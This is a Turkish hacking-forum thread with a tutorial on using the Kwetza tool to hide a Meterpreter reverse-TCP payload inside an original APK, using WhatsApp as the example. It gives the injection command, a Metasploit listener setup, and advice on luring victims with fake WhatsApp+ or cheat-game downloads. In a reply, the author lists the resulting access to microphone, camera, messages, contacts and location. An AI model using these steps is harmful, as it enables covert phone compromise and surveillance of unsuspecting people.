Kwetza ile Orijinal APK'ye Zararlı Yazılım Gizleyin // Qwx

Qwx

Kıdemli Üye
30 Nis 2012
2,728
13
KWETZA

Herkese merhaba,

Nesnelerin interneti çağı ile birlikte her gün katlananarak artan telefon kullanıcısı bulunmaktadır. 7'den 70'e herkesin elinde bir akıllı telefon görmüşsünüzdür. Kimisi kullanmayı hiç bilmez sadece telefonun sosyal medyaya yaradığını zannederken kimileri de bir telefon ile harikalar yaratır. Google Play'deki bir çok paralı uygulamayı internetden indirmek isteyenler, Whatsapp+ gibi orijinal Whatsapp'ı editlenmiş halini indirmek isteyenler gibi kullanıcılar internetten .apk dosyaları indirmektedir. Biz de orijinal .apk'lere nasıl payload enjekte ederiz onu göreceğiz bugün sizlere tanıtacağım aracın adı Kwetza.

Kwetza; Python tabanlı bir arac olup zararlı yazılımı başka bir .apk dosyasının içine enjekte etmeye yaramaktadır.

Kwetza GitHub Adresi ;

https://github.com/sensepost/kwetza

Kurulum;

İlk olarak aracımızı makinemize indiriyoruz.

Kod:
git clone https://github.com/sensepost/kwetza.git

gitclone.jpg


İndirme işlememiz tamamlandı. Aracın düzgün çalışabilmesi için BeautifulSoup uygulaması gerekmektedir. Bende önceki araçlardan dolayı indirdiğim için sizler bu kodu kullanarak indirebilirsiniz.

Kod:
pip install beautifulsoup4

pip.jpg


Kullanım;

Bütün indirmelerimiz tamamlanmış bulunmaktadır. Şimdi sırada bu aracımızın kullanım örneklendirmesine. İlk olarak orijinal .apk dosyasını indirdiğimiz aracın aynı dizinine atıyoruz. Ben örnek sırasında Whatsapp.apk sını kullanacağım.

dizin.jpg


Evet şimdi sırada ilk olarak IP adresimizi öğreniyoruz. Sarı marklı yeri yazacağız.

Kod:
ifconfig

ifconfig.jpg


IP adresimizi öğrendik şimdi aracımıza geçelim.

<Yes/No> kodumuzun sonuna ekliyoruz eğer yes yazarsak .apk'ya ek zararlı izinler yüklemiş oluyoruz eğer no yazarsak da herhangi bir izin değişikliğinden bulunmadan orijinal Whatsapp.apk'nın izinlerini kullanıyoruz. Sizden bir şifre istemektedir, Şifre : password

Kod:
python kwetza.py <sizinistediginizbir>.apk tcp <sizinipadress> 4444 <yes/no> AssistActivity

ornek.jpg


İçine zararlı yazılım koyduğumuz .apk'miz oluşturuldu.
Apk'mizin oluşturulan dizini : /kwetza/<apkadi>/dist/
Bu işlemden sonra whatsapp.apk'mızın VirüsTotal sonucu: TIKLA
Ardından oluşturduğumuz .apk'nin dinlenmesine gelelim. Herhangi birisi bizim .apk'mizi çalıştırdığı zaman karşımıza çıkacaktır.

Kod:
msfconsole
Kod:
[COLOR=Silver][B]use exploit/multi/handler
set lhost <ipadress>
set lport 4444
set payload android/meterpreter/reverse_tcp[/B][/COLOR]
[COLOR=Silver][B]run[/B][/COLOR]


deneme.jpg


Evet bir aracımızın daha tanıtımının sonuna gelmiş bulunmaktayız. Oluşturduğumuz .apk'yi indirtmek SM ile çok kolay bir durum olacaktır örnek vermek gerekirse bir çok kişi hileli oyunlar oynamaktadır veya Whatsapp+ herkes istemektedir bunun gibi bir çok kombinasyon türetilebilir.

 
Son düzenleme:

Qwx

Kıdemli Üye
30 Nis 2012
2,728
13
Ellerine sağlık güzel konu olmuş.


Teşekkür ederim.


Teşekkürler ellerine sağlık çok iyi anlatmışsın .


Teşekkür ederim.


Ellerine sağlık deneyeceğim


Teşekkür ederim.


hocam elinize sağlık bir sorum olucaktı panele forumun logosunu nasıl koydunuz



Teşekkür ederim. Panel den kastınız Terminal ise ; Terminale logoyu koymadım, logoyu SS çektikten sonra Photoshop yardımı ile fotoğrafın üstüne koyuyorum ardından opaklık ayarını değiştiriyorum.
 

Kaez

Yeni üye
12 Ocak 2019
20
0
Sorum olucaktı. Bu araç ile neler yapılabilir. Yani yüklediğimiz cihazdaki bilgileri falan alabilirmiyiz
 

Qwx

Kıdemli Üye
30 Nis 2012
2,728
13
Sorum olucaktı. Bu araç ile neler yapılabilir. Yani yüklediğimiz cihazdaki bilgileri falan alabilirmiyiz

Bu araç ile cihaza tam erişim sağlamış oluyoruz. Tam erişimden biraz bahsedecek olursak da mikrofondan ses kaydı, canlı kamera izleme, fotoğraf çekme, arama kayıtlarını görme, rehber kaydını almak, mesajları görme, konumunu görme ve daha fazlasına erişim sağlamış oluyoruz.Yorumunuz için teşekkür ederim.

Kullanımını gosteren bır vıdeo cekersenız guzel olur.

Kullanımını fotoğraf ve anlatım yolu ile iyi bir şekilde anlattığımı düşünmekteyim; video çekmiş olsaydım da herhangi bir eklemede bulunmayacaktım, Yorumunuz için teşekkür ederim.

Anlatım güzel olmuş :) Klavyene sağlık

Çok teşekkürler, iyi kullanımlar.
 

drkasmot

Üye
17 Tem 2016
137
27
:D bu forumun kitlesi neden böyle ya
herkes yorum kasma peşinde hiçkimse paylaşılan şeyleri deneyip sorunlarını bildirmiyor kwetzanın birleştirdiği payloadlar açılmıyor 2 yıl öncede böyleydi hala böyle çöp konu
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.